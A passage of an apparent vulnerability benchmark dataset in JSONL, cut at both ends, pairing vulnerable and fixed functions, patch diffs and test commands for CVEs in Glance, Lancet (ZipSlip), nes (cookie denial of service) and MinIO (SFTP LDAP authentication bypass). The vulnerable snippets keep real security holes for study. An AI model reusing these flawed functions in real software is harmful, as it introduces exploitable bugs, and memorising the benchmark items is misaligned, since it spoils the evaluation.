'killed' or\n 'active' depending on whether the upload completed successfully.\n\n 2. If the image data exists somewhere else, you can upload indirectly\n from the external source using the x-glance-api-copy-from header.\n Once the image is uploaded, the external store is not subsequently\n consulted, i.e. the image content is served out from the configured\n glance image store. State transitions are as for option #1.\n\n 3. If the image data exists somewhere else, you can reference the\n source using the x-image-meta-location header. The image content\n will be served out from the external store, i.e. is never uploaded\n to the configured glance image store.\n\n 4. 
If the image data is not available yet, but you'd like reserve a\n spot for it, you can omit the data and a record will be created in\n the 'queued' state. This exists primarily to maintain backwards\n compatibility with OpenStack/Rackspace API semantics.\n\n The request body *must* be encoded as application/octet-stream,\n otherwise an HTTPBadRequest is returned.\n\n Upon a successful save of the image data and metadata, a response\n containing metadata about the image is returned, including its\n opaque identifier.\n\n :param req: The WSGI/Webob Request object\n :param image_meta: Mapping of metadata about image\n :param image_data: Actual image data that is to be stored\n\n :raises HTTPBadRequest if x-image-meta-location is missing\n and the request body is not application/octet-stream\n image data.\n \"\"\"\n self._enforce(req, 'add_image')\n is_public = image_meta.get('is_public')\n if is_public:\n self._enforce(req, 'publicize_image')\n if Controller._copy_from(req):\n self._enforce(req, 'copy_from')\n\n image_meta = self._reserve(req, image_meta)\n id = image_meta['id']\n\n image_meta = self._handle_source(req, id, image_meta, image_data)\n\n location_uri = image_meta.get('location')\n if location_uri:\n self.update_store_acls(req, id, location_uri, public=is_public)\n\n # Prevent client from learning the location, as it\n # could contain security credentials\n image_meta.pop('location', None)\n\n return {'image_meta': image_meta}"}], "vul_patch": "--- a/glance/api/v1/images.py\n+++ b/glance/api/v1/images.py\n@@ -44,6 +44,8 @@\n is_public = image_meta.get('is_public')\n if is_public:\n self._enforce(req, 'publicize_image')\n+ if Controller._copy_from(req):\n+ self._enforce(req, 'copy_from')\n \n image_meta = self._reserve(req, image_meta)\n id = image_meta['id']\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2022-41920", "cve_description": "Lancet is a general utility library for the go programming language. Affected versions are subject to a ZipSlip issue when using the fileutil package to unzip files. This issue has been addressed and a fix will be included in versions 2.1.10 and 1.3.4. Users are advised to upgrade. 
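The Glance patch above is an authorization fix rather than URL validation: `copy_from` can still reach arbitrary URLs, but operators can now deny the capability per policy. A distilled sketch of that gating; `enforce` stands in for Glance's policy engine and is an assumption of this example:

```python
def create_image(req, image_meta, enforce, copy_from_url=None):
    """Sketch of the patched create() flow, policy checks only."""
    enforce(req, "add_image")
    if image_meta.get("is_public"):
        enforce(req, "publicize_image")
    if copy_from_url:
        # New in the patch: importing from a caller-supplied URL is its
        # own privilege; without it, any uploader could use Glance as a
        # masked port scanner against internal hosts.
        enforce(req, "copy_from")
    ...
```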
There are no known workarounds for this issue.", "cwe_info": {"CWE-73": {"name": "External Control of File Name or Path", "description": "The product allows user input to control or influence paths or file names that are used in filesystem operations."}, "CWE-22": {"name": "Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')", "description": "The product uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the product does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory."}}, "repo": "https://github.com/duke-git/lancet", "patch_url": ["https://github.com/duke-git/lancet/commit/f869a0a67098e92d24ddd913e188b32404fa72c9", "https://github.com/duke-git/lancet/commit/f133b32faa05eb93e66175d01827afa4b7094572"], "programing_language": "Go", "vul_func": [{"id": "vul_go_226_1", "commit": "be000a4", "file_path": "fileutil/file.go", "start_line": "216", "end_line": "259", "snippet": "func UnZip(zipFile string, destPath string) error {\n\tdestPath = filepath.Clean(destPath) + string(os.PathSeparator)\n\n\tzipReader, err := zip.OpenReader(zipFile)\n\tif err != nil {\n\t\treturn err\n\t}\n\tdefer zipReader.Close()\n\n\tfor _, f := range zipReader.File {\n\t\tpath := filepath.Join(destPath, f.Name)\n\n\t\t//issue#62: fix ZipSlip bug\n\t\tif !strings.HasPrefix(path, destPath) {\n\t\t\treturn fmt.Errorf(\"%s: illegal file path\", path)\n\t\t}\n\n\t\tif f.FileInfo().IsDir() {\n\t\t\tos.MkdirAll(path, os.ModePerm)\n\t\t} else {\n\t\t\tif err = os.MkdirAll(filepath.Dir(path), os.ModePerm); err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\n\t\t\tinFile, err := f.Open()\n\t\t\tif err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\t\t\tdefer inFile.Close()\n\n\t\t\toutFile, err := os.OpenFile(path, os.O_WRONLY|os.O_CREATE|os.O_TRUNC, f.Mode())\n\t\t\tif err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\t\t\tdefer outFile.Close()\n\n\t\t\t_, err = io.Copy(outFile, inFile)\n\t\t\tif err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\t\t}\n\t}\n\treturn nil\n}"}], "fix_func": [{"id": "fix_go_226_1", "commit": "f869a0a", "file_path": "fileutil/file.go", "start_line": "216", "end_line": "259", "snippet": "func UnZip(zipFile string, destPath string) error {\n\n\tzipReader, err := zip.OpenReader(zipFile)\n\tif err != nil {\n\t\treturn err\n\t}\n\tdefer zipReader.Close()\n\n\tfor _, f := range zipReader.File {\n\t\tpath := filepath.Join(destPath, f.Name)\n\n\t\t//issue#62: fix ZipSlip bug\n\t\tpath, err := safeFilepathJoin(destPath, f.Name)\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\n\t\tif f.FileInfo().IsDir() {\n\t\t\tos.MkdirAll(path, os.ModePerm)\n\t\t} else {\n\t\t\tif err = os.MkdirAll(filepath.Dir(path), os.ModePerm); err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\n\t\t\tinFile, err := f.Open()\n\t\t\tif err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\t\t\tdefer inFile.Close()\n\n\t\t\toutFile, err := os.OpenFile(path, os.O_WRONLY|os.O_CREATE|os.O_TRUNC, f.Mode())\n\t\t\tif err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\t\t\tdefer outFile.Close()\n\n\t\t\t_, err = io.Copy(outFile, inFile)\n\t\t\tif err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\t\t}\n\t}\n\treturn nil\n}"}, {"id": "fix_go_226_2", "commit": "f869a0a", "file_path": "fileutil/file.go", "start_line": "261", "end_line": "270", "snippet": "func safeFilepathJoin(path1, path2 string) (string, error) {\n\trelPath, err := filepath.Rel(\".\", path2)\n\tif 
err != nil || strings.HasPrefix(relPath, \"..\") {\n\t\treturn \"\", fmt.Errorf(\"(zipslip) filepath is unsafe %q: %v\", path2, err)\n\t}\n\tif path1 == \"\" {\n\t\tpath1 = \".\"\n\t}\n\treturn filepath.Join(path1, filepath.Join(\"/\", relPath)), nil\n}"}], "vul_patch": "--- a/fileutil/file.go\n+++ b/fileutil/file.go\n@@ -1,5 +1,4 @@\n func UnZip(zipFile string, destPath string) error {\n-\tdestPath = filepath.Clean(destPath) + string(os.PathSeparator)\n \n \tzipReader, err := zip.OpenReader(zipFile)\n \tif err != nil {\n@@ -11,8 +10,9 @@\n \t\tpath := filepath.Join(destPath, f.Name)\n \n \t\t//issue#62: fix ZipSlip bug\n-\t\tif !strings.HasPrefix(path, destPath) {\n-\t\t\treturn fmt.Errorf(\"%s: illegal file path\", path)\n+\t\tpath, err := safeFilepathJoin(destPath, f.Name)\n+\t\tif err != nil {\n+\t\t\treturn err\n \t\t}\n \n \t\tif f.FileInfo().IsDir() {\n\n--- /dev/null\n+++ b/fileutil/file.go\n@@ -0,0 +1,10 @@\n+func safeFilepathJoin(path1, path2 string) (string, error) {\n+\trelPath, err := filepath.Rel(\".\", path2)\n+\tif err != nil || strings.HasPrefix(relPath, \"..\") {\n+\t\treturn \"\", fmt.Errorf(\"(zipslip) filepath is unsafe %q: %v\", path2, err)\n+\t}\n+\tif path1 == \"\" {\n+\t\tpath1 = \".\"\n+\t}\n+\treturn filepath.Join(path1, filepath.Join(\"/\", relPath)), nil\n+}\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2017-16025", "cve_description": "Nes is a websocket extension library for hapi. Hapi is a webserver framework. Versions below and including 6.4.0 have a denial of service vulnerability via an invalid Cookie header. This is only present when websocket authentication is set to `cookie`. Submitting an invalid cookie on the websocket upgrade request will cause the node process to error out.", "cwe_info": {"CWE-287": {"name": "Improper Authentication", "description": "When an actor claims to have a given identity, the product does not prove or insufficiently proves that the claim is correct."}}, "repo": "https://github.com/hapijs/nes", "patch_url": ["https://github.com/hapijs/nes/commit/249ba1755ed6977fbc208463c87364bf884ad655"], "programing_language": "JavaScript", "vul_func": [{"id": "vul_js_59_1", "commit": "71e9232", "file_path": "lib/socket.js", "start_line": 524, "end_line": 547, "snippet": "internals.Socket.prototype._authenticate = function () {\n\n const config = this._listener._settings.auth;\n if (!config) {\n return;\n }\n\n if (config.timeout) {\n this.auth._timeout = setTimeout(() => this.disconnect(), config.timeout);\n }\n\n const cookies = this._ws.upgradeReq.headers.cookie;\n if (!cookies) {\n return;\n }\n\n this._listener._connection.states.parse(cookies, (ignoreErr, state, failed) => {\n\n const auth = state[config.cookie];\n if (auth) {\n this.auth._error = this._setCredentials(auth.credentials, auth.artifacts);\n }\n });\n};"}], "fix_func": [{"id": "fix_js_59_1", "commit": "249ba1755ed6977fbc208463c87364bf884ad655", "file_path": "lib/socket.js", "start_line": 524, "end_line": 562, "snippet": "internals.Socket.prototype._authenticate = function () {\n\n const config = this._listener._settings.auth;\n if (!config) {\n return;\n }\n\n if (config.timeout) {\n this.auth._timeout = setTimeout(() => this.disconnect(), config.timeout);\n }\n\n const cookies = this._ws.upgradeReq.headers.cookie;\n if (!cookies) {\n return;\n }\n\n this._listener._connection.states.parse(cookies, (err, state, failed) => {\n\n if (err) {\n this.auth._error = Boom.unauthorized('Invalid nes authentication cookie');\n return;\n }\n\n const auth = 
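A Python analogue of the `safeFilepathJoin` helper the Lancet patch introduces above: compute the member path relative to the extraction root and refuse anything that climbs upward or is absolute. Names and the `ValueError` are illustrative; the Go original returns an error value instead.

```python
import os
import zipfile

def safe_join(dest: str, member_name: str) -> str:
    """Reject archive members whose path escapes the extraction root."""
    rel = os.path.normpath(member_name)
    if rel.startswith("..") or os.path.isabs(rel):
        raise ValueError(f"(zipslip) unsafe member path: {member_name!r}")
    return os.path.join(dest, rel)

def unzip(zip_path: str, dest: str) -> None:
    with zipfile.ZipFile(zip_path) as zf:
        for name in zf.namelist():
            target = safe_join(dest, name)  # raises on "../../evil"
            if name.endswith("/"):
                os.makedirs(target, exist_ok=True)
            else:
                os.makedirs(os.path.dirname(target) or ".", exist_ok=True)
                with zf.open(name) as src, open(target, "wb") as dst:
                    dst.write(src.read())
```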
state[config.cookie];\n if (auth) {\n this.auth._error = this._setCredentials(auth.credentials, auth.artifacts);\n }\n });\n};\n\n\ninternals.Socket.prototype._setCredentials = function (credentials, artifacts) {\n\n this.auth.isAuthenticated = true;\n this.auth.credentials = credentials;\n this.auth.artifacts = artifacts;\n\n return this._listener._sockets.auth(this);\n};"}], "vul_patch": "--- a/lib/socket.js\n+++ b/lib/socket.js\n@@ -14,7 +14,12 @@\n return;\n }\n \n- this._listener._connection.states.parse(cookies, (ignoreErr, state, failed) => {\n+ this._listener._connection.states.parse(cookies, (err, state, failed) => {\n+\n+ if (err) {\n+ this.auth._error = Boom.unauthorized('Invalid nes authentication cookie');\n+ return;\n+ }\n \n const auth = state[config.cookie];\n if (auth) {\n@@ -22,3 +27,13 @@\n }\n });\n };\n+\n+\n+internals.Socket.prototype._setCredentials = function (credentials, artifacts) {\n+\n+ this.auth.isAuthenticated = true;\n+ this.auth.credentials = credentials;\n+ this.auth.artifacts = artifacts;\n+\n+ return this._listener._sockets.auth(this);\n+};\n\n", "poc_test_cmd": "#!/bin/bash\n# From ghcr.io/anonymous2578-data/cve-2017-16025:latest\n# bash /workspace/fix-run.sh\nset -e\n\ncd /workspace/nes\n\nGLOBAL_EXCLUDE=\"AggregateError,Atomics,BigUint64Array,BigInt64Array,BigInt,FinalizationRegistry,WeakRef,URL,URLSearchParams,DOMException,AbortController,AbortSignal,Event,EventTarget,TextEncoder,TextDecoder,TransformStream,TransformStreamDefaultController,WritableStream,WritableStreamDefaultController,WritableStreamDefaultWriter,ReadableStream,ReadableStreamDefaultReader,ReadableStreamBYOBReader,ReadableStreamBYOBRequest,ReadableByteStreamController,ReadableStreamDefaultController,ByteLengthQueuingStrategy,CountQueuingStrategy,TextEncoderStream,TextDecoderStream,CompressionStream,DecompressionStream,queueMicrotask,structuredClone,atob,btoa,BroadcastChannel,MessageChannel,MessagePort,Blob,File,Performance,PerformanceEntry,PerformanceMark,PerformanceMeasure,PerformanceObserver,PerformanceObserverEntryList,PerformanceResourceTiming,performance,fetch,FormData,Headers,Request,Response,MessageEvent,WebSocket,Iterator,SharedArrayBuffer,Navigator,navigator,crypto,CryptoKey,SubtleCrypto,CustomEvent,Crypto\"\n\nexport NODE_NO_WARNINGS=1\ngit apply --whitespace=nowarn /workspace/test.patch /workspace/fix.patch\nnode node_modules/lab/bin/lab \\\n -a code \\\n --globals $GLOBAL_EXCLUDE \\\n -g \"errors on invalid cookie\" \\\n test/auth.js\n\n", "unit_test_cmd": "#!/bin/bash\n# From ghcr.io/anonymous2578-data/cve-2017-16025:latest\n# bash /workspace/unit_test.sh\nset -e\n\ncd 
/workspace/nes\n\nGLOBAL_EXCLUDE=\"AggregateError,Atomics,BigUint64Array,BigInt64Array,BigInt,FinalizationRegistry,WeakRef,URL,URLSearchParams,DOMException,AbortController,AbortSignal,Event,EventTarget,TextEncoder,TextDecoder,TransformStream,TransformStreamDefaultController,WritableStream,WritableStreamDefaultController,WritableStreamDefaultWriter,ReadableStream,ReadableStreamDefaultReader,ReadableStreamBYOBReader,ReadableStreamBYOBRequest,ReadableByteStreamController,ReadableStreamDefaultController,ByteLengthQueuingStrategy,CountQueuingStrategy,TextEncoderStream,TextDecoderStream,CompressionStream,DecompressionStream,queueMicrotask,structuredClone,atob,btoa,BroadcastChannel,MessageChannel,MessagePort,Blob,File,Performance,PerformanceEntry,PerformanceMark,PerformanceMeasure,PerformanceObserver,PerformanceObserverEntryList,PerformanceResourceTiming,performance,fetch,FormData,Headers,Request,Response,MessageEvent,WebSocket,Iterator,SharedArrayBuffer,Navigator,navigator,crypto,CryptoKey,SubtleCrypto,CustomEvent,Crypto\"\n\nexport NODE_NO_WARNINGS=1\n\nnode node_modules/lab/bin/lab \\\n -a code \\\n --globals $GLOBAL_EXCLUDE \\\n test/index.js test/auth.js test/listener.js test/socket.js\n\n"} {"cve_id": "CVE-2025-27414", "cve_description": "MinIO is a high performance object storage. Starting in RELEASE.2024-06-06T09-36-42Z and prior to \nRELEASE.2025-02-28T09-55-16Z, a bug in evaluating the trust of the SSH key used in an SFTP connection to MinIO allows authentication bypass and unauthorized data access. On a MinIO server with SFTP access configured and using LDAP as an external identity provider, MinIO supports SSH key based authentication for SFTP connections when the user has the `sshPublicKey` attribute set in their LDAP server. The server trusts the client's key only when the public key is the same as the `sshPublicKey` attribute. Due to the bug, when the user has no `sshPublicKey` property in LDAP, the server ends up trusting the key allowing the client to perform any FTP operations allowed by the MinIO access policies associated with the LDAP user (or any of their groups). Three requirements must be met in order to exploit the vulnerability. First, the MinIO server must be configured to allow SFTP access and use LDAP as an external identity provider. Second, the attacker must have knowledge of an LDAP username that does not have the `sshPublicKey` property set. Third, such an LDAP username or one of their groups must also have some MinIO access policy configured. When this bug is successfully exploited, the attacker can perform any FTP operations (i.e. reading, writing, deleting and listing objects) allowed by the access policy associated with the LDAP user account (and their groups). 
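(Referring back to the nes record above.) The fix there is pure defensive error handling: a cookie-parse failure on the websocket upgrade must degrade into an authentication error on that one connection, not an unhandled exception that crashes the Node process. A Python-flavoured sketch of the same idea using the standard-library cookie parser; the surrounding framework is assumed, not nes's API:

```python
from http.cookies import SimpleCookie, CookieError

def credentials_from_cookie(header: str, cookie_name: str):
    """Parse a Cookie header defensively; None means unauthenticated."""
    try:
        jar = SimpleCookie()
        jar.load(header)  # raises CookieError on malformed input
    except CookieError:
        return None       # treat as unauthenticated, keep serving
    morsel = jar.get(cookie_name)
    return morsel.value if morsel else None
```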
Version 1.2.0 fixes the issue.", "cwe_info": {"CWE-287": {"name": "Improper Authentication", "description": "When an actor claims to have a given identity, the product does not prove or insufficiently proves that the claim is correct."}}, "repo": "https://github.com/minio/minio", "patch_url": ["https://github.com/minio/minio/commit/4c71f1b4ec0fb2a473ddaac18c20ec9e63f267ec"], "programing_language": "Go", "vul_func": [{"id": "vul_go_239_1", "commit": "6cd8a37", "file_path": "cmd/sftp-server.go", "start_line": 65, "end_line": 65, "snippet": "var caPublicKey ssh.PublicKey"}, {"id": "vul_go_239_2", "commit": "6cd8a37", "file_path": "cmd/sftp-server.go", "start_line": 137, "end_line": 191, "snippet": "func authenticateSSHConnection(c ssh.ConnMetadata, key ssh.PublicKey, pass []byte) (*ssh.Permissions, error) {\n\tuser, found := strings.CutSuffix(c.User(), \"=ldap\")\n\tif found {\n\t\tif !globalIAMSys.LDAPConfig.Enabled() {\n\t\t\treturn nil, errSFTPLDAPNotEnabled\n\t\t}\n\t\treturn processLDAPAuthentication(key, pass, user)\n\t}\n\n\tuser, found = strings.CutSuffix(c.User(), \"=svc\")\n\tif found {\n\t\tgoto internalAuth\n\t}\n\n\tif globalIAMSys.LDAPConfig.Enabled() {\n\t\tperms, _ := processLDAPAuthentication(key, pass, user)\n\t\tif perms != nil {\n\t\t\treturn perms, nil\n\t\t}\n\t}\n\ninternalAuth:\n\tui, ok := globalIAMSys.GetUser(context.Background(), user)\n\tif !ok {\n\t\treturn nil, errNoSuchUser\n\t}\n\n\tif caPublicKey != nil && pass == nil {\n\t\terr := validateKey(c, key)\n\t\tif err != nil {\n\t\t\treturn nil, errAuthentication\n\t\t}\n\t} else {\n\t\t// Temporary credentials are not allowed.\n\t\tif ui.Credentials.IsTemp() {\n\t\t\treturn nil, errAuthentication\n\t\t}\n\t\tif subtle.ConstantTimeCompare([]byte(ui.Credentials.SecretKey), pass) != 1 {\n\t\t\treturn nil, errAuthentication\n\t\t}\n\t}\n\n\tcopts := map[string]string{\n\t\t\"AccessKey\": ui.Credentials.AccessKey,\n\t\t\"SecretKey\": ui.Credentials.SecretKey,\n\t}\n\tif ui.Credentials.IsTemp() {\n\t\tcopts[\"SessionToken\"] = ui.Credentials.SessionToken\n\t}\n\n\treturn &ssh.Permissions{\n\t\tCriticalOptions: copts,\n\t\tExtensions: make(map[string]string),\n\t}, nil\n}"}, {"id": "vul_go_239_3", "commit": "6cd8a37", "file_path": "cmd/sftp-server.go", "start_line": 193, "end_line": 311, "snippet": "func processLDAPAuthentication(key ssh.PublicKey, pass []byte, user string) (perms *ssh.Permissions, err error) {\n\tvar lookupResult *xldap.DNSearchResult\n\tvar targetGroups []string\n\n\tif pass == nil && key == nil {\n\t\treturn nil, errAuthentication\n\t}\n\n\tif pass != nil {\n\t\tsa, _, err := globalIAMSys.getServiceAccount(context.Background(), user)\n\t\tif err == nil {\n\t\t\tif subtle.ConstantTimeCompare([]byte(sa.Credentials.SecretKey), pass) != 1 {\n\t\t\t\treturn nil, errAuthentication\n\t\t\t}\n\n\t\t\treturn &ssh.Permissions{\n\t\t\t\tCriticalOptions: map[string]string{\n\t\t\t\t\t\"AccessKey\": sa.Credentials.AccessKey,\n\t\t\t\t\t\"SecretKey\": sa.Credentials.SecretKey,\n\t\t\t\t},\n\t\t\t\tExtensions: make(map[string]string),\n\t\t\t}, nil\n\t\t}\n\n\t\tif !errors.Is(err, errNoSuchServiceAccount) {\n\t\t\treturn nil, err\n\t\t}\n\n\t\tlookupResult, targetGroups, err = globalIAMSys.LDAPConfig.Bind(user, string(pass))\n\t\tif err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t} else if key != nil {\n\t\tlookupResult, targetGroups, err = globalIAMSys.LDAPConfig.LookupUserDN(user)\n\t\tif err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t}\n\n\tif lookupResult == nil {\n\t\treturn nil, 
errNoSuchUser\n\t}\n\n\tldapPolicies, _ := globalIAMSys.PolicyDBGet(lookupResult.NormDN, targetGroups...)\n\tif len(ldapPolicies) == 0 {\n\t\treturn nil, errSFTPUserHasNoPolicies\n\t}\n\n\tclaims := make(map[string]interface{})\n\tfor attribKey, attribValue := range lookupResult.Attributes {\n\t\t// we skip multi-value attributes here, as they cannot\n\t\t// be stored in the critical options.\n\t\tif len(attribValue) != 1 {\n\t\t\tcontinue\n\t\t}\n\n\t\tif attribKey == \"sshPublicKey\" && key != nil {\n\t\t\tkey2, _, _, _, err := ssh.ParseAuthorizedKey([]byte(attribValue[0]))\n\t\t\tif err != nil {\n\t\t\t\treturn nil, errSFTPPublicKeyBadFormat\n\t\t\t}\n\n\t\t\tif subtle.ConstantTimeCompare(key2.Marshal(), key.Marshal()) != 1 {\n\t\t\t\treturn nil, errAuthentication\n\t\t\t}\n\t\t}\n\t\tclaims[ldapAttribPrefix+attribKey] = attribValue[0]\n\t}\n\n\texpiryDur, err := globalIAMSys.LDAPConfig.GetExpiryDuration(\"\")\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tclaims[expClaim] = UTCNow().Add(expiryDur).Unix()\n\tclaims[ldapUserN] = user\n\tclaims[ldapUser] = lookupResult.NormDN\n\n\tcred, err := auth.GetNewCredentialsWithMetadata(claims, globalActiveCred.SecretKey)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\t// Set the parent of the temporary access key, this is useful\n\t// in obtaining service accounts by this cred.\n\tcred.ParentUser = lookupResult.NormDN\n\n\t// Set this value to LDAP groups, LDAP user can be part\n\t// of large number of groups\n\tcred.Groups = targetGroups\n\n\t// Set the newly generated credentials, policyName is empty on purpose\n\t// LDAP policies are applied automatically using their ldapUser, ldapGroups\n\t// mapping.\n\tupdatedAt, err := globalIAMSys.SetTempUser(context.Background(), cred.AccessKey, cred, \"\")\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\treplLogIf(context.Background(), globalSiteReplicationSys.IAMChangeHook(context.Background(), madmin.SRIAMItem{\n\t\tType: madmin.SRIAMItemSTSAcc,\n\t\tSTSCredential: &madmin.SRSTSCredential{\n\t\t\tAccessKey: cred.AccessKey,\n\t\t\tSecretKey: cred.SecretKey,\n\t\t\tSessionToken: cred.SessionToken,\n\t\t\tParentUser: cred.ParentUser,\n\t\t},\n\t\tUpdatedAt: updatedAt,\n\t}))\n\n\treturn &ssh.Permissions{\n\t\tCriticalOptions: map[string]string{\n\t\t\t\"AccessKey\": cred.AccessKey,\n\t\t\t\"SecretKey\": cred.SecretKey,\n\t\t\t\"SessionToken\": cred.SessionToken,\n\t\t},\n\t\tExtensions: make(map[string]string),\n\t}, nil\n}"}, {"id": "vul_go_239_4", "commit": "6cd8a37", "file_path": "cmd/sftp-server.go", "start_line": 313, "end_line": 339, "snippet": "func validateKey(c ssh.ConnMetadata, clientKey ssh.PublicKey) (err error) {\n\tif caPublicKey == nil {\n\t\treturn errors.New(\"public key authority validation requested but no ca public key specified.\")\n\t}\n\n\tcert, ok := clientKey.(*ssh.Certificate)\n\tif !ok {\n\t\treturn errSftpPublicKeyWithoutCert\n\t}\n\n\t// ssh.CheckCert called by ssh.Authenticate accepts certificates\n\t// with empty principles list so we block those in here.\n\tif len(cert.ValidPrincipals) == 0 {\n\t\treturn errSftpCertWithoutPrincipals\n\t}\n\n\t// Verify that certificate provided by user is issued by trusted CA,\n\t// username in authentication request matches to identities in certificate\n\t// and that certificate type is correct.\n\tchecker := ssh.CertChecker{}\n\tchecker.IsUserAuthority = func(k ssh.PublicKey) bool {\n\t\treturn subtle.ConstantTimeCompare(caPublicKey.Marshal(), k.Marshal()) == 1\n\t}\n\n\t_, err = checker.Authenticate(c, clientKey)\n\treturn\n}"}, 
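The vulnerable `processLDAPAuthentication` above only compares keys inside the attribute loop, so an LDAP entry with no `sshPublicKey` attribute never reaches the comparison and the login falls through to success. A short Python sketch of the fail-closed check the patch adds; the attribute shapes are simplified assumptions, and both keys are taken to be canonical wire-format bytes:

```python
import hmac

def check_ssh_key(client_key_blob: bytes, ldap_attributes: dict) -> None:
    """Refuse key-based login unless a matching key is actually on record."""
    stored = ldap_attributes.get("sshPublicKey")
    if stored is None:
        # The missing guard: with no key on record there is nothing to
        # compare, so the attempt must be rejected rather than trusted.
        raise PermissionError("no sshPublicKey attribute for this user")
    if not hmac.compare_digest(stored, client_key_blob):
        raise PermissionError("public key does not match LDAP sshPublicKey")
```

`hmac.compare_digest` mirrors the `subtle.ConstantTimeCompare` calls in the Go code: the comparison cost should not depend on where the inputs first diverge.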
{"id": "vul_go_239_5", "commit": "6cd8a37", "file_path": "cmd/sftp-server.go", "start_line": 385, "end_line": 514, "snippet": "func startSFTPServer(args []string) {\n\tvar (\n\t\tport int\n\t\tpublicIP string\n\t\tsshPrivateKey string\n\t\tuserCaKeyFile string\n\t\tdisablePassAuth bool\n\t)\n\n\tallowPubKeys := supportedPubKeyAuthAlgos\n\tallowKexAlgos := preferredKexAlgos\n\tallowCiphers := preferredCiphers\n\tallowMACs := supportedMACs\n\tvar err error\n\n\tfor _, arg := range args {\n\t\ttokens := strings.SplitN(arg, \"=\", 2)\n\t\tif len(tokens) != 2 {\n\t\t\tlogger.Fatal(fmt.Errorf(\"invalid arguments passed to --sftp=%s\", arg), \"unable to start SFTP server\")\n\t\t}\n\t\tswitch tokens[0] {\n\t\tcase \"address\":\n\t\t\thost, portStr, err := net.SplitHostPort(tokens[1])\n\t\t\tif err != nil {\n\t\t\t\tlogger.Fatal(fmt.Errorf(\"invalid arguments passed to --sftp=%s (%v)\", arg, err), \"unable to start SFTP server\")\n\t\t\t}\n\t\t\tport, err = strconv.Atoi(portStr)\n\t\t\tif err != nil {\n\t\t\t\tlogger.Fatal(fmt.Errorf(\"invalid arguments passed to --sftp=%s (%v)\", arg, err), \"unable to start SFTP server\")\n\t\t\t}\n\t\t\tif port < 1 || port > 65535 {\n\t\t\t\tlogger.Fatal(fmt.Errorf(\"invalid arguments passed to --sftp=%s, (port number must be between 1 to 65535)\", arg), \"unable to start SFTP server\")\n\t\t\t}\n\t\t\tpublicIP = host\n\t\tcase \"ssh-private-key\":\n\t\t\tsshPrivateKey = tokens[1]\n\t\tcase \"pub-key-algos\":\n\t\t\tallowPubKeys = filterAlgos(arg, strings.Split(tokens[1], \",\"), supportedPubKeyAuthAlgos)\n\t\tcase \"kex-algos\":\n\t\t\tallowKexAlgos = filterAlgos(arg, strings.Split(tokens[1], \",\"), supportedKexAlgos)\n\t\tcase \"cipher-algos\":\n\t\t\tallowCiphers = filterAlgos(arg, strings.Split(tokens[1], \",\"), supportedCiphers)\n\t\tcase \"mac-algos\":\n\t\t\tallowMACs = filterAlgos(arg, strings.Split(tokens[1], \",\"), supportedMACs)\n\t\tcase \"trusted-user-ca-key\":\n\t\t\tuserCaKeyFile = tokens[1]\n\t\tcase \"password-auth\":\n\t\t\tdisablePassAuth, _ = strconv.ParseBool(tokens[1])\n\t\t}\n\t}\n\n\tif port == 0 {\n\t\tport = 8022 // Default SFTP port, since no port was given.\n\t}\n\n\tif sshPrivateKey == \"\" {\n\t\tlogger.Fatal(fmt.Errorf(\"invalid arguments passed, private key file is mandatory for --sftp='ssh-private-key=path/to/id_ecdsa'\"), \"unable to start SFTP server\")\n\t}\n\n\tprivateBytes, err := os.ReadFile(sshPrivateKey)\n\tif err != nil {\n\t\tlogger.Fatal(fmt.Errorf(\"invalid arguments passed, private key file is not accessible: %v\", err), \"unable to start SFTP server\")\n\t}\n\n\tprivate, err := ssh.ParsePrivateKey(privateBytes)\n\tif err != nil {\n\t\tlogger.Fatal(fmt.Errorf(\"invalid arguments passed, private key file is not parseable: %v\", err), \"unable to start SFTP server\")\n\t}\n\n\tif userCaKeyFile != \"\" {\n\t\tkeyBytes, err := os.ReadFile(userCaKeyFile)\n\t\tif err != nil {\n\t\t\tlogger.Fatal(fmt.Errorf(\"invalid arguments passed, trusted user certificate authority public key file is not accessible: %v\", err), \"unable to start SFTP server\")\n\t\t}\n\n\t\tcaPublicKey, _, _, _, err = ssh.ParseAuthorizedKey(keyBytes)\n\t\tif err != nil {\n\t\t\tlogger.Fatal(fmt.Errorf(\"invalid arguments passed, trusted user certificate authority public key file is not parseable: %v\", err), \"unable to start SFTP server\")\n\t\t}\n\t}\n\n\t// An SSH server is represented by a ServerConfig, which holds\n\t// certificate details and handles authentication of ServerConns.\n\tsshConfig := &ssh.ServerConfig{\n\t\tConfig: 
ssh.Config{\n\t\t\tKeyExchanges: allowKexAlgos,\n\t\t\tCiphers: allowCiphers,\n\t\t\tMACs: allowMACs,\n\t\t},\n\t\tPublicKeyAuthAlgorithms: allowPubKeys,\n\t\tPublicKeyCallback: sshPubKeyAuth,\n\t}\n\n\tif !disablePassAuth {\n\t\tsshConfig.PasswordCallback = sshPasswordAuth\n\t} else {\n\t\tsshConfig.PasswordCallback = nil\n\t}\n\n\tsshConfig.AddHostKey(private)\n\n\thandleSFTPSession := func(channel ssh.Channel, sconn *ssh.ServerConn) {\n\t\tvar remoteIP string\n\n\t\tif host, _, err := net.SplitHostPort(sconn.RemoteAddr().String()); err == nil {\n\t\t\tremoteIP = host\n\t\t}\n\t\tserver := sftp.NewRequestServer(channel, NewSFTPDriver(sconn.Permissions, remoteIP), sftp.WithRSAllocator())\n\t\tdefer server.Close()\n\t\tserver.Serve()\n\t}\n\n\tsftpServer, err := xsftp.NewServer(&xsftp.Options{\n\t\tPublicIP: publicIP,\n\t\tPort: port,\n\t\t// OpensSSH default handshake timeout is 2 minutes.\n\t\tSSHHandshakeDeadline: 2 * time.Minute,\n\t\tLogger: 